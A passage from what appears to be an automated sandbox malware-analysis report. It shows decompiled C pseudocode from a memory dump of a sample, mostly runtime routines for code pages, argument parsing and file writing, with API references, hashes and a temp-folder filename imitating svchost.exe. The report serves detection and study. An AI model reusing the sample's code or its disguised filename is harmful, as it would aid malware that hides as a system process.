												_t81 = _t67;
											}
										}
									}
									_t97 = _t97 + 1;
									asm("adc edx, 0x0");
									_t81 = _t81 + 1;
									__eflags = _t97 - _v4108;
									if(_t97 != _v4108) {
										continue;
									} else {
										__eflags = 0 - _t72;
										if(0 != _t72) {
											continue;
										}
										break;
									}
								}
								L21:
								asm("cdq");
								asm("adc edx, [ebp-0x1018]");
								goto L23;
							}
							__eflags = _t72;
							if(_t72 == 0) {
								goto L21;
							}
							goto L13;
						}
						__eflags = _v4108 - _t59;
						if(_v4108 > _t59) {
							goto L22;
						}
						goto L11;
					}
					__eflags = _t58;
					if(_t58 < 0) {
						goto L22;
					}
					goto L8;
				} else {
					L24:
					return E00E8AE43(_v8 ^ _t98);
				}
			}

0x00e90d93
0x00e90d98
0x00e90d9f
0x00e90da6
0x00e90dac
0x00e90daf
0x00e90db5
0x00e90dcb
0x00e90dd7
0x00e90de0
0x00e90de8
0x00e90deb
0x00e90e00
0x00e90e05
0x00e90e0f
0x00e90e15
0x00e90e17
0x00e90e1d
0x00e90e23
0x00e90e27
0x00e90f0e
0x00e90f0e
0x00e90f13
0x00000000
0x00e90f14
0x00e90e2d
0x00e90e31
0x00000000
0x00000000
0x00e90e50
0x00e90e56
0x00e90e58
0x00000000
0x00000000
0x00e90e67
0x00e90e6f
0x00e90e71
0x00000000
0x00000000
0x00e90e77
0x00e90e81
0x00e90e81
0x00e90e87
0x00e90e8d
0x00e90e8f
0x00000000
0x00000000
0x00e90e91
0x00e90e9b
0x00e90ea3
0x00e90ea5
0x00e90eab
0x00e90ead
0x00e90eb3
0x00e90eb9
0x00e90eb9
0x00e90eb9
0x00e90ebb
0x00000000
0x00000000
0x00e90ebd
0x00e90ebf
0x00e90ec1
0x00e90ee0
0x00e90ee0
0x00e90ec3
0x00e90ec6
0x00e90ec8
0x00e90eca
0x00e90ecd
0x00e90ed0
0x00e90ed2
0x00e90ed2
0x00e90ed0
0x00e90ec8
0x00e90ee2
0x00e90ee5
0x00e90ee8
0x00e90ee9
0x00e90eef
0x00000000
0x00e90ef1
0x00e90ef1
0x00e90ef3
0x00000000
0x00000000
0x00000000
0x00e90ef3
0x00e90eef
0x00e90ef5
0x00e90eff
0x00e90f06
0x00000000
0x00e90f06
0x00e90eb5
0x00e90eb7
0x00000000
0x00000000
0x00000000
0x00e90eb7
0x00e90e93
0x00e90e99
0x00000000
0x00000000
0x00000000
0x00e90e99
0x00e90e79
0x00e90e7b
0x00000000
0x00000000
0x00000000
0x00e90db7
0x00e90f15
0x00e90f23
0x00e90f23

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E90DD0
ReadFile.KERNEL32(?,?,00001000,?,00000000,00000000), ref: 00E90E50

Strings

F8A/, xrefs: 00E90D98

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: F8A/
API String ID: 1834446548-73971870
Opcode ID: 54c3d1264543c55d7aaebdd06d0c569bdc5384dd51cfce88c38b5002562ee594
Instruction ID: 8effc2dd0d6fbc70321d3602703040a052496e8a501aa9379e44dca470bd0f88
Opcode Fuzzy Hash: 54c3d1264543c55d7aaebdd06d0c569bdc5384dd51cfce88c38b5002562ee594
Instruction Fuzzy Hash: 9A41C271A001589FDF25DF14CC80BF977B6EB48304F9495E9E549AB141D770EEC58B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E9A304, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00E9A304(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				signed int _t58;
				char _t61;
				char _t67;
				signed char _t68;
				signed int _t69;
				signed int _t79;
				char _t83;
				signed int _t86;
				signed char _t87;
				char _t88;
				void* _t89;
				signed int _t90;
				intOrPtr _t95;
				signed int _t96;

				_t58 =  *0xea9014; // 0xa413846
				_v8 = _t58 ^ _t96;
				_t95 = _a4;
				if( *(_t95 + 4) == 0xfde9) {
					L19:
					__eflags = 0;
					_t83 = 0;
					do {
						_t46 = _t83 - 0x61; // -97
						_t89 = _t46;
						_t47 = _t89 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t89 - 0x19;
							if(_t89 > 0x19) {
								_t61 = 0;
							} else {
								_t53 = _t95 + 0x19; // 0xe9a742
								 *(_t53 + _t83) =  *(_t53 + _t83) | 0x00000020;
								_t54 = _t83 - 0x20; // -32
								_t61 = _t54;
							}
						} else {
							 *(_t95 + _t83 + 0x19) =  *(_t95 + _t83 + 0x19) | 0x00000010;
							_t52 = _t83 + 0x20; // 0x20
							_t61 = _t52;
						}
						 *((char*)(_t95 + _t83 + 0x119)) = _t61;
						_t83 = _t83 + 1;
						__eflags = _t83 - 0x100;
					} while (_t83 < 0x100);
					L26:
					return E00E8AE43(_v8 ^ _t96);
				}
				_t5 = _t95 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t67 = 0;
					do {
						 *((char*)(_t96 + _t67 - 0x104)) = _t67;
						_t67 = _t67 + 1;
					} while (_t67 < 0x100);
					_t68 = _v1814;
					_t86 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t104 = _t68;
						if(_t68 == 0) {
							break;
						}
						_t90 =  *(_t86 + 1) & 0x000000ff;
						_t69 = _t68 & 0x000000ff;
						while(1) {
							__eflags = _t69 - _t90;
							if(_t69 > _t90) {
								break;
							}
							__eflags = _t69 - 0x100;
							if(_t69 >= 0x100) {
								break;
							}
							 *((char*)(_t96 + _t69 - 0x104)) = 0x20;
							_t69 = _t69 + 1;
							__eflags = _t69;
						}
						_t86 = _t86 + 2;
						__eflags = _t86;
						_t68 =  *_t86;
					}
					_t14 = _t95 + 4; // 0xe8458d00
					E00E9BFC9(0, 0x100, _t95, _t104, 0, 1,  &_v264, 0x100,  &_v1800,  *_t14, 0);
					_t17 = _t95 + 4; // 0xe8458d00
					_t20 = _t95 + 0x21c; // 0xe83d2a76
					E00E99335(0, 0x100, _t95, _t104, 0,  *_t20, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t17, 0);
					_t22 = _t95 + 4; // 0xe8458d00
					_t24 = _t95 + 0x21c; // 0xe83d2a76
					E00E99335(0, 0x100, _t95, _t104, 0,  *_t24, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t22, 0);
					_t79 = 0;
					do {
						_t87 =  *(_t96 + _t79 * 2 - 0x704) & 0x0000ffff;
						if((_t87 & 0x00000001) == 0) {
							__eflags = _t87 & 0x00000002;
							if((_t87 & 0x00000002) == 0) {
								_t88 = 0;
							} else {
								 *(_t95 + _t79 + 0x19) =  *(_t95 + _t79 + 0x19) | 0x00000020;
								_t88 =  *((intOrPtr*)(_t96 + _t79 - 0x304));
							}
						} else {
							 *(_t95 + _t79 + 0x19) =  *(_t95 + _t79 + 0x19) | 0x00000010;
							_t88 =  *((intOrPtr*)(_t96 + _t79 - 0x204));
						}
						 *((char*)(_t95 + _t79 + 0x119)) = _t88;
						_t79 = _t79 + 1;
					} while (_t79 < 0x100);
					goto L26;
				}
			}

0x00e9a30f
0x00e9a316
0x00e9a31b
0x00e9a326
0x00e9a438
0x00e9a438
0x00e9a43f
0x00e9a441
0x00e9a441
0x00e9a441
0x00e9a444
0x00e9a447
0x00e9a44a
0x00e9a456
0x00e9a459
0x00e9a468
0x00e9a45b
0x00e9a45b
0x00e9a460
0x00e9a463
0x00e9a463
0x00e9a463
0x00e9a44c
0x00e9a44c
0x00e9a451
0x00e9a451
0x00e9a451
0x00e9a46a
0x00e9a471
0x00e9a472
0x00e9a472
0x00e9a476
0x00e9a486
0x00e9a486
0x00e9a333
0x00e9a33e
0x00000000
0x00e9a344
0x00e9a34b
0x00e9a34d
0x00e9a34d
0x00e9a354
0x00e9a355
0x00e9a359
0x00e9a35f
0x00e9a365
0x00e9a38d
0x00e9a38d
0x00e9a38f
0x00000000
0x00000000
0x00e9a36e
0x00e9a372
0x00e9a384
0x00e9a384
0x00e9a386
0x00000000
0x00000000
0x00e9a377
0x00e9a379
0x00000000
0x00000000
0x00e9a37b
0x00e9a383
0x00e9a383
0x00e9a383
0x00e9a388
0x00e9a388
0x00e9a38b
0x00e9a38b
0x00e9a392
0x00e9a3a7
0x00e9a3ad
0x00e9a3c1
0x00e9a3c8
0x00e9a3d7
0x00e9a3e9
0x00e9a3f0
0x00e9a3f8
0x00e9a3fa
0x00e9a3fa
0x00e9a405
0x00e9a415
0x00e9a418
0x00e9a428
0x00e9a41a
0x00e9a41a
0x00e9a41f
0x00e9a41f
0x00e9a407
0x00e9a407
0x00e9a40c
0x00e9a40c
0x00e9a42a
0x00e9a431
0x00e9a432
0x00000000
0x00e9a436

APIs

GetCPInfo.KERNEL32(E8458D00,?,0000000D,00000001,00000000), ref: 00E9A336

Strings

, xrefs: 00E9A37B
F8A/, xrefs: 00E9A30F

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $F8A/
API String ID: 1807457897-212266561
Opcode ID: 352551c6177616ed394df40ab0e12c7483eab0a5a9b2bbe66cb9638276595185
Instruction ID: 037a9f61d3376f061f94adb32f4d95b53fd366c34dec239514f5d4850c3e98de
Opcode Fuzzy Hash: 352551c6177616ed394df40ab0e12c7483eab0a5a9b2bbe66cb9638276595185
Instruction Fuzzy Hash: CC414E705042489BDF21CA18CD88BFE77FDEF15304F2814BCE9DAA7142D2749D459BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E9312D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E9312D(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				intOrPtr* _t57;
				signed int _t63;
				intOrPtr _t65;

				_t48 = _a4;
				if(_t48 != 0) {
					if(_t48 == 2 || _t48 == 1) {
						E00E9A638();
						E00E9A085(0, 0xeaa408, 0x104);
						_t26 =  *0xeaa530; // 0xfc3468
						 *0xeaa520 = 0xeaa408;
						_v20 = _t26;
						if(_t26 == 0 ||  *_t26 == 0) {
							_t26 = 0xeaa408;
							_v20 = 0xeaa408;
						}
						_v8 = 0;
						_v16 = 0;
						_t63 = E00E933DE(E00E93265( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
						if(_t63 != 0) {
							E00E93265( &_v8, _v20, _t63, _t63 + _v8 * 4,  &_v8,  &_v16);
							if(_t48 != 1) {
								_v12 = 0;
								_push( &_v12);
								_t49 = E00E99FB3(_t48, 0, _t63, _t63);
								if(_t49 == 0) {
									_t57 = _v12;
									_t54 = 0;
									_t36 = _t57;
									if( *_t57 == 0) {
										L17:
										_t37 = 0;
										 *0xeaa524 = _t54;
										_v12 = 0;
										_t49 = 0;
										 *0xeaa528 = _t57;
										L18:
										E00E964B8(_t37);
										_v12 = 0;
										goto L19;
									} else {
										goto L16;
									}
									do {
										L16:
										_t36 = _t36 + 4;
										_t54 = _t54 + 1;
									} while ( *_t36 != 0);
									goto L17;
								}
								_t37 = _v12;
								goto L18;
							}
							 *0xeaa524 = _v8 - 1;
							_t43 = _t63;
							_t63 = 0;
							 *0xeaa528 = _t43;
							goto L12;
						} else {
							_t44 = E00E95BBD();
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							L12:
							_t49 = 0;
							L19:
							E00E964B8(_t63);
							_t40 = _t49;
							goto L20;
						}
					} else {
						_t45 = E00E95BBD();
						_t65 = 0x16;
						 *_t45 = _t65;
						E00E928EC();
						_t40 = _t65;
						L20:
						return _t40;
					}
				}
				return 0;
			}

0x00e93136
0x00e9313b
0x00e93148
0x00e93166
0x00e93179
0x00e9317e
0x00e93186
0x00e9318c
0x00e93191
0x00e93198
0x00e9319a
0x00e9319a
0x00e931a0
0x00e931a7
0x00e931c0
0x00e931c7
0x00e931e8
0x00e931f3
0x00e9320e
0x00e93211
0x00e93218
0x00e9321e
0x00e93225
0x00e93228
0x00e9322a
0x00e9322e
0x00e93238
0x00e93238
0x00e9323a
0x00e93240
0x00e93243
0x00e93245
0x00e9324b
0x00e9324c
0x00e93252
0x00000000
0x00000000
0x00000000
0x00000000
0x00e93230
0x00e93230
0x00e93230
0x00e93233
0x00e93234
0x00000000
0x00e93230
0x00e93220
0x00000000
0x00e93220
0x00e931f9
0x00e931fe
0x00e93200
0x00e93202
0x00000000
0x00e931c9
0x00e931c9
0x00e931ce
0x00e931d0
0x00e931d1
0x00e93207
0x00e93207
0x00e93255
0x00e93256
0x00e9325c
0x00000000
0x00e9325e
0x00e9314f
0x00e9314f
0x00e93156
0x00e93157
0x00e93159
0x00e9315e
0x00e9325f
0x00000000
0x00e9325f
0x00e93148
0x00000000

Strings

C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe, xrefs: 00E93170, 00E93177, 00E931AD

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe
API String ID: 0-2410410132
Opcode ID: 0a4e91adaf0d2cdcc70af34960e5c9e89f745434b41f54608db21b08296651e0
Instruction ID: 3c039f11b36937b07f4d930bef87c220bc6bb1729d82d909ba1ba9276861ff21
Opcode Fuzzy Hash: 0a4e91adaf0d2cdcc70af34960e5c9e89f745434b41f54608db21b08296651e0
Instruction Fuzzy Hash: 34417171E00218AFCF219BA9DC859AEBBF8EF89710B24106AE814F7221E7705B44C795

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2907, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00EA2907(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				char _v1716;
				char _v5132;
				intOrPtr _v5136;
				void* _v5140;
				long _v5144;
				intOrPtr _v5148;
				signed int _t29;
				signed int* _t38;
				intOrPtr _t42;
				void* _t52;
				intOrPtr _t57;
				signed int _t62;
				signed short* _t65;
				signed int _t66;
				signed short* _t69;
				intOrPtr* _t72;
				intOrPtr _t74;
				signed int _t75;
				void* _t76;

				E00EA4F80();
				_t29 =  *0xea9014; // 0xa413846
				_v8 = _t29 ^ _t75;
				_t65 = _a12;
				_t72 = _a4;
				_v5140 =  *((intOrPtr*)( *((intOrPtr*)(0xeaa6c8 + (_a8 >> 6) * 4)) + 0x18 + (_a8 & 0x0000003f) * 0x38));
				_t57 = _a16 + _t65;
				_v5136 = _t57;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t69 = _t65;
				if(_t65 < _t57) {
					do {
						_t74 = _v5136;
						_t38 =  &_v1716;
						while(_t69 < _t74) {
							_t62 =  *_t69 & 0x0000ffff;
							_t69 =  &(_t69[1]);
							if(_t62 == 0xa) {
								_t66 = 0xd;
								 *_t38 = _t66;
								_t38 =  &(_t38[0]);
							}
							 *_t38 = _t62;
							_t38 =  &(_t38[0]);
							if(_t38 <  &_v12) {
								continue;
							}
							break;
						}
						_t42 = E00E9A975(0xfde9, 0,  &_v1716, _t38 -  &_v1716 >> 1,  &_v5132, 0xd55, 0, 0);
						_t72 = _a4;
						_t76 = _t76 + 0x20;
						_v5148 = _t42;
						if(_t42 == 0) {
							L12:
							 *_t72 = GetLastError();
						} else {
							_t52 = 0;
							if(_t42 == 0) {
								goto L10;
							} else {
								while(WriteFile(_v5140,  &_v5132 + _t52, _t42 - _t52,  &_v5144, 0) != 0) {
									_t52 = _t52 + _v5144;
									_t42 = _v5148;
									if(_t52 < _t42) {
										continue;
									} else {
										goto L10;
									}
									goto L13;
								}
								goto L12;
							}
						}
						goto L13;
						L10:
						 *((intOrPtr*)(_t72 + 4)) = _t69 - _a12;
					} while (_t69 < _v5136);
				}
				L13:
				return E00E8AE43(_v8 ^ _t75);
			}

0x00ea2911
0x00ea2916
0x00ea291d
0x00ea2925
0x00ea293a
0x00ea2947
0x00ea294d
0x00ea2951
0x00ea2957
0x00ea2958
0x00ea2959
0x00ea295a
0x00ea295e
0x00ea2964
0x00ea2964
0x00ea296a
0x00ea2970
0x00ea2974
0x00ea2977
0x00ea297d
0x00ea2981
0x00ea2982
0x00ea2985
0x00ea2985
0x00ea2988
0x00ea298b
0x00ea2993
0x00000000
0x00000000
0x00000000
0x00ea2993
0x00ea29ba
0x00ea29bf
0x00ea29c2
0x00ea29c5
0x00ea29cd
0x00ea2a20
0x00ea2a26
0x00ea29cf
0x00ea29cf
0x00ea29d3
0x00000000
0x00ea29d5
0x00ea29d5
0x00ea29fa
0x00ea2a00
0x00ea2a08
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea2a08
0x00000000
0x00ea29d5
0x00ea29d3
0x00000000
0x00ea2a0a
0x00ea2a0f
0x00ea2a12
0x00ea2a1e
0x00ea2a28
0x00ea2a3a

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,00EA2C48,00000010,00E913E1,00000000,?,?,00E913E1,00E913E1,00000010,00E98E85,00000000), ref: 00EA29F0
GetLastError.KERNEL32(00EA2C48,00000010,00E913E1,00000000,?,?,00E913E1,00E913E1,00000010,00E98E85,00000000,8304488B,?,?,?), ref: 00EA2A20

Strings

F8A/, xrefs: 00EA2916

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: F8A/
API String ID: 442123175-73971870
Opcode ID: fa190ae1c11d00267487f4e0b9225741b678806726da818af99d476eb36b9645
Instruction ID: 8a3ea71e66c61424a0da9b73a3ed1df6cc2f01a59dfbf20246d0f141384e55e7
Opcode Fuzzy Hash: fa190ae1c11d00267487f4e0b9225741b678806726da818af99d476eb36b9645
Instruction Fuzzy Hash: 14318571B00219AFDB24CF5DDC81BEA77B5EB59701F1450ADE605FB260D670BD808B61

Uniqueness

Uniqueness Score: -1.00%

Function 00EA0E95, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00EA0E95(void* __ebx, void* __edi, void* _a4, signed int* _a8) {
				intOrPtr _v0;
				intOrPtr* _v8;
				signed int _v12;
				char _v14;
				short _v16;
				signed int _v20;
				char _v24;
				char _v25;
				signed int* _v32;
				char* _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v60;
				char* _v84;
				signed int* _v96;
				intOrPtr _v124;
				char _v136;
				void* __ecx;
				intOrPtr* _t97;
				void* _t107;
				signed int _t110;
				signed int* _t112;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr _t118;
				void* _t120;
				signed int* _t122;
				void* _t126;
				void* _t127;
				signed int* _t131;
				intOrPtr _t141;
				void* _t142;
				void* _t150;
				void* _t151;
				void* _t152;
				intOrPtr _t154;
				intOrPtr* _t156;
				intOrPtr* _t158;
				intOrPtr _t162;
				void* _t163;
				intOrPtr _t164;
				intOrPtr _t170;
				intOrPtr* _t172;
				intOrPtr _t173;
				signed int _t175;
				char* _t177;
				signed int* _t179;
				signed int _t180;
				intOrPtr _t181;
				void* _t184;
				intOrPtr* _t186;
				signed int* _t188;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr* _t203;
				intOrPtr* _t213;
				signed int _t215;
				intOrPtr _t219;
				intOrPtr* _t220;
				intOrPtr* _t224;
				signed int _t225;
				char _t226;
				intOrPtr* _t227;
				signed int _t228;
				intOrPtr* _t230;
				void* _t231;
				intOrPtr* _t232;
				intOrPtr* _t233;
				signed int _t235;
				void* _t238;
				char* _t239;
				signed int _t241;
				char* _t244;
				void* _t245;
				signed int _t246;
				intOrPtr _t248;
				void* _t250;
				signed int _t252;
				signed int _t254;
				void* _t255;
				void* _t256;

				_push(__ebx);
				_t175 = 0;
				 *_a8 =  *_a8 & 0x00000000;
				_t97 = _a4;
				_t224 = _t97;
				_push(__edi);
				_v8 = _t97;
				_t186 =  *_t97;
				if(_t186 == 0) {
					L5:
					_t177 = 1;
				} else {
					do {
						_t250 = _t186 + 1;
						do {
							_t173 =  *_t186;
							_t186 = _t186 + 1;
						} while (_t173 != 0);
						_t224 = _t224 + 4;
						_t175 = _t175 + _t186 - _t250 + 1;
						_t186 =  *_t224;
					} while (_t186 != 0);
					if(_t175 <= 1) {
						goto L5;
					}
				}
				_t241 = E00E998AF(_t177, 1);
				_pop(_t188);
				if(_t241 != 0) {
					_t235 = _t241;
					_t100 =  *_a4;
					if( *_a4 == 0) {
						L14:
						 *_a8 = _t241;
						goto L15;
					} else {
						while(1) {
							_t107 = E00E96383(_t235, _t241 - _t235 + _t177, _t100);
							_t254 = _t254 + 0xc;
							if(_t107 != 0) {
								break;
							}
							_t232 = _v8;
							_t220 =  *_t232;
							_v8 = _t220 + 1;
							do {
								_t170 =  *_t220;
								_t220 = _t220 + 1;
							} while (_t170 != 0);
							_t188 = _t220 - _v8;
							_t233 = _t232 + 4;
							_t239 = _t235 + _t188;
							_v8 = _t233;
							 *_t239 = 0x20;
							_t235 = _t239 + 1;
							_t100 =  *_t233;
							if(_t100 != 0) {
								continue;
							} else {
								 *((char*)(_t235 - 1)) = _t100;
								goto L14;
							}
							goto L87;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00E92919();
						asm("int3");
						_t252 = _t254;
						_t255 = _t254 - 0x34;
						_t110 =  *0xea9014; // 0xa413846
						_v48 = _t110 ^ _t252;
						_t112 = _v32;
						_push(_t241);
						_t244 = _v36;
						_v84 = _t244;
						 *_t112 =  *_t112 & 0x00000000;
						_v96 = _t112;
						if(_t244 != 0) {
							_v44 = _v44 & 0x00000000;
							_v24 = 0x74737953;
							_v20 = 0x6f526d65;
							_v16 = 0x746f;
							_v14 = 0;
							_t115 = E00E9185E( &_v44, 0,  &_v24);
							_t256 = _t255 + 0xc;
							if(_t115 == 0) {
								_t116 = _v44;
								if(_t116 == 0) {
									_v36 = 0xb;
								} else {
									_t231 = _t116 + 1;
									do {
										_t219 =  *_t116;
										_t116 = _t116 + 1;
									} while (_t219 != 0);
									_v36 = _t116 - _t231 + 0xc;
								}
								_t190 =  *_t244;
								_push(_t177);
								_push(_t235);
								_t179 = 2;
								_v32 = _t179;
								if(_t190 != 0) {
									_t230 = _t244;
									do {
										_t238 = _t190 + 1;
										do {
											_t164 =  *_t190;
											_t190 = _t190 + 1;
										} while (_t164 != 0);
										_t230 = _t230 + 4;
										_t179 = _t179 + _t190 - _t238 + 1;
										_t190 =  *_t230;
									} while (_t190 != 0);
									_v32 = _t179;
								}
								_t235 = E00E9AA59(_t190);
								if(_t235 != 0) {
									_t225 = _t235;
									_v56 = _t235;
									if( *_t235 != 0x3d) {
										do {
											_t215 = _t225;
											_t184 = _t215 + 1;
											do {
												_t163 =  *_t215;
												_t215 = _t215 + 1;
											} while (_t163 != 0);
											_t225 = _t225 + 1 + _t215 - _t184;
										} while ( *_t225 != 0x3d);
										_v56 = _t225;
									}
									_t180 = _t225;
									if( *_t225 == 0x3d) {
										while( *((char*)(_t180 + 1)) != 0 &&  *((char*)(_t180 + 2)) == 0x3a &&  *((char*)(_t180 + 3)) == 0x3d) {
											_t213 = _t180 + 4;
											_v40 = _t213 + 1;
											do {
												_t162 =  *_t213;
												_t213 = _t213 + 1;
											} while (_t162 != 0);
											_t180 = _t180 + 5 + _t213 - _v40;
											if( *_t180 == 0x3d) {
												continue;
											}
											goto L47;
										}
									}
									L47:
									_t181 = _t180 - _t225;
									_v52 = _t244;
									_t226 =  *_t244;
									_v40 = _t181;
									while(_t226 != 0) {
										_t45 =  &_v24; // 0x74737953
										_t191 = _t45;
										_t245 = _t191 + 1;
										do {
											_t118 =  *_t191;
											_t191 = _t191 + 1;
										} while (_t118 != 0);
										_t47 =  &_v24; // 0x74737953
										_t120 = E00EA16F6(_t226, _t47, _t191 - _t245);
										_t256 = _t256 + 0xc;
										if(_t120 == 0) {
											_v25 = 1;
											_t122 = _v32 + _t181;
										} else {
											_t158 = _v52 + 4;
											_v52 = _t158;
											_t226 =  *_t158;
											continue;
										}
										L54:
										_v32 = _t122;
										_t244 = E00E998AF(_t122, 1);
										if(_t244 != 0) {
											_t124 = _v40;
											_t177 = _t244;
											if(_v40 == 0) {
												_t188 = _v32;
											} else {
												E00E8D670(_t244, _v56, _t124);
												_t154 = _v40;
												_t256 = _t256 + 0xc;
												_t188 = _v32 - _t154;
												_v32 = _t188;
												_t177 = _t244 + _t154;
											}
											_t126 =  *_v48;
											while(_t126 != 0) {
												_t127 = E00E96383(_t177, _t188, _t126);
												_t256 = _t256 + 0xc;
												if(_t127 != 0) {
													goto L79;
												} else {
													_t227 = _v48;
													_t203 =  *_t227;
													_v40 = _t203 + 1;
													do {
														_t141 =  *_t203;
														_t203 = _t203 + 1;
													} while (_t141 != 0);
													_t142 = _t203 - _v40 + 1;
													_t188 = _v32 - _t142;
													_t177 = _t177 + _t142;
													_t228 = _t227 + 4;
													_v32 = _t188;
													_v48 = _t228;
													_t126 =  *_t228;
													continue;
												}
												goto L87;
											}
											if(_v25 != _t126) {
												L72:
												if(_t177 == _t244) {
													 *_t177 = 0;
													_t177 = _t177 + 1;
												}
												 *_t177 = 0;
												 *_v60 = _t244;
												_t248 = 0;
												goto L75;
											} else {
												_t150 = E00E96383(_t177, _v36,  &_v24);
												_t256 = _t256 + 0xc;
												if(_t150 != 0) {
													goto L79;
												} else {
													_t151 = E00EA0E2C(_t177, _v36, 0xe775c0);
													_t256 = _t256 + 0xc;
													if(_t151 != 0) {
														goto L79;
													} else {
														if(_v44 == _t151) {
															L71:
															_t177 = _t177 + _v36;
															goto L72;
														} else {
															_t152 = E00EA0E2C(_t177, _v36, _v44);
															_t256 = _t256 + 0xc;
															if(_t152 != 0) {
																goto L79;
															} else {
																goto L71;
															}
														}
													}
												}
											}
										} else {
											E00E95B87(0xe);
											_t156 = E00E95BBD();
											_t248 = 0xc;
											 *_t156 = _t248;
											L75:
											E00E964B8(0);
											goto L76;
										}
										goto L87;
									}
									_v25 = _t226;
									_t122 = _v32 + _t181 + _v36;
									goto L54;
								} else {
									_t248 = 0x16;
									L76:
									E00E964B8(_t235);
									goto L77;
								}
							} else {
								if(_t115 == 0x16) {
									L79:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E00E92919();
									asm("int3");
									_push(_t252);
									_push(_t188);
									_push(_t188);
									_push(_t244);
									_t246 = 0;
									_v136 = 0;
									if(E00EA0E95(_t177, _t235, _v124,  &_v136) == 0) {
										_t131 =  &_v20;
										_v20 = 0;
										_push(_t131);
										_push(_v0);
										L17();
										if(_t131 == 0) {
											 *_a4 = _v16;
											 *_a8 = _v20;
											E00E964B8(0);
											E00E964B8(0);
										} else {
											E00E964B8(_v20);
											E00E964B8(_v16);
											_t246 = 0xffffffff;
										}
									} else {
										E00E964B8(_v16);
										_t246 = 0xffffffff;
									}
									return _t246;
								} else {
									_t248 =  *((intOrPtr*)(E00E95BBD()));
									L77:
									E00E964B8(_v44);
									goto L78;
								}
							}
						} else {
							L78:
							return E00E8AE43(_v12 ^ _t252);
						}
					}
				} else {
					E00E95B87(8);
					_t172 = E00E95BBD();
					_push(0xc);
					_pop(0);
					 *_t172 = 0;
					L15:
					E00E964B8(0);
					return 0;
				}
				L87:
			}

0x00ea0e9e
0x00ea0ea0
0x00ea0ea2
0x00ea0ea5
0x00ea0ea8
0x00ea0eaa
0x00ea0eab
0x00ea0eae
0x00ea0eb2
0x00ea0ed1
0x00ea0ed3
0x00ea0eb4
0x00ea0eb4
0x00ea0eb4
0x00ea0eb7
0x00ea0eb7
0x00ea0eb9
